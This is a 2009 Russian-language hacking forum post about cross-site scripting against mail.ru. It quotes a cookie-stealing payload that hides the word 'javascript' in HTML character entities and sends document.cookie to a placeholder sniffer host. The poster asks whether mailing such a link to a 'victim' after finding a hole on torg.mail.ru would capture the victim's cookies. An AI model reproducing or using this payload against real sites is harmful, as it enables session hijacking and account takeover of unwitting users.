Тема: XSS на mail.ru
Показать сообщение отдельно

Обясните
  #20  
Старый 10.05.2009, 18:18
LemoTTT
Познающий
Регистрация: 29.04.2009
Сообщений: 56
С нами: 8965761

Репутация: 6
Smile Обясните

Давайте вы мне подробнее раскажете:
Вот код:
PHP код:
<a href="&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116:img=new Image();img.src='<img src=http://адрес_сниффера/s.gif?'+escape(document.cookie)+'>';">text</a
Вопрос № 1:
PHP код:
&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116 
Это зашифрованая ссылка на xss? или что?
Вопрос № 2:
Допустим если я как то найду xss на http://torg.mail.ru/
и потом пришлю вышеуказаную ссылку на почту (тоже мейл ру, а если другая почта?)жертве , она пр кн откроет, и все куки мои?
 
Ответить с цитированием